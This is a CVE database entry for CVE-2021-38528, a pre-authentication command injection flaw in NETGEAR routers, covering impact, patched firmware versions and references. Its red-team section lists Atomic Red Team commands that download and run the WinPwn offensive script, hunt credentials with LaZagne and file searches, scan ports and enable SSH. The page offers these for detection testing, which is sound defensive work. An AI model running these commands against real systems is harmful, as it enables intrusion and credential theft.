CVE-2021-38528
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the firmware of multiple NETGEAR router models. The affected components process user-supplied input in system-level command contexts without adequate sanitization, allowing injection of arbitrary shell commands. The flaw resides in the firmware's interface handling mechanisms that execute commands based on external input, lacking appropriate authentication controls.
Vulnerability Description
Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D8500 before 1.0.3.58, R6900P before 1.3.2.132, R7000P before 1.3.2.132, R7100LG before 1.0.0.64, WNDR3400v3 before 1.0.1.38, and XR300 before 1.0.3.56.
Impact
An unauthenticated attacker with network access can execute arbitrary commands on affected devices, potentially gaining full control over the system. This enables actions such as modifying configurations, disrupting services, or pivoting within the network. The vulnerability requires no user interaction and has low attack complexity, as indicated by the CVSS vector (AV:A/AC:L/PR:N/UI:N), making exploitation feasible in real-world scenarios with significant operational impact.
Solution
NETGEAR has released firmware updates addressing this vulnerability: D8500 version 1.0.3.58, R6900P and R7000P version 1.3.2.132, R7100LG version 1.0.0.64, WNDR3400v3 version 1.0.1.38, and XR300 version 1.0.3.56. Users should upgrade to these or later versions as specified in the NETGEAR Security Advisory PSV-2020-0297 (https://kb.netgear.com/000063781). No alternative mitigations or workarounds are recommended by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in certain NETGEAR devices stems from a command injection flaw that allows unauthenticated attackers to execute arbitrary commands on the affected systems. This weakness arises from improper validation of user input, enabling malicious actors to manipulate command execution within the device's firmware. Specifically, the devices in question include models such as the D8500, R6900P, R7000P, R7100LG, WNDR3400v3, and XR300, all of which are susceptible to this critical security issue if they are running outdated firmware versions. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk that could lead to significant breaches of security.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting the web interface of the affected devices. An attacker could leverage this flaw by sending specially crafted requests to the device, which would then be processed without adequate sanitization. This could allow the attacker to execute arbitrary commands with the same privileges as the device's operating system. Scenarios may include gaining unauthorized access to sensitive network configurations, redirecting traffic, or even deploying malware within the local network. The potential for remote code execution makes this vulnerability particularly dangerous, as it can be exploited from anywhere on the internet, provided the attacker can reach the device.
The real-world impact of this vulnerability is profound, especially for businesses relying on these NETGEAR devices for their network infrastructure. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and compromise of the entire network. For organizations, this translates into significant business risks, including financial losses, reputational damage, and potential legal ramifications stemming from data breaches. The ease of exploitation combined with the critical nature of the devices involved makes this a pressing concern for IT security teams.
To detect and mitigate this vulnerability, organizations should prioritize updating their NETGEAR devices to the latest firmware versions that address this flaw. Regularly monitoring for firmware updates and applying patches promptly is essential in maintaining the security posture of the network. Additionally, implementing network segmentation can help limit the exposure of vulnerable devices to potential attackers. Intrusion detection systems (IDS) can be employed to monitor for unusual traffic patterns or unauthorized access attempts, providing an additional layer of security. Organizations should also consider conducting regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the command injection vulnerability in certain NETGEAR devices presents a significant threat to network security. The potential for exploitation by unauthenticated attackers highlights the importance of maintaining updated firmware and employing robust security practices. By understanding the nature of this vulnerability and implementing effective detection and mitigation strategies, organizations can better protect their networks from the risks associated with this critical flaw.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Netgear | D8500 Firmware | All |
cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R6900p Firmware | All |
cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R7000p Firmware | All |
cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R7100lg Firmware | All |
cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Wndr3400 Firmware | All |
cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Xr300 Firmware | All |
cpe:2.3:o:netgear:xr300_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-38528 |
| kb.netgear.com |
GitHub CVE
x_refsource_MISC
|
https://kb.netgear.com/000063781/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Gateways-and-Routers-PSV-2020-0297 |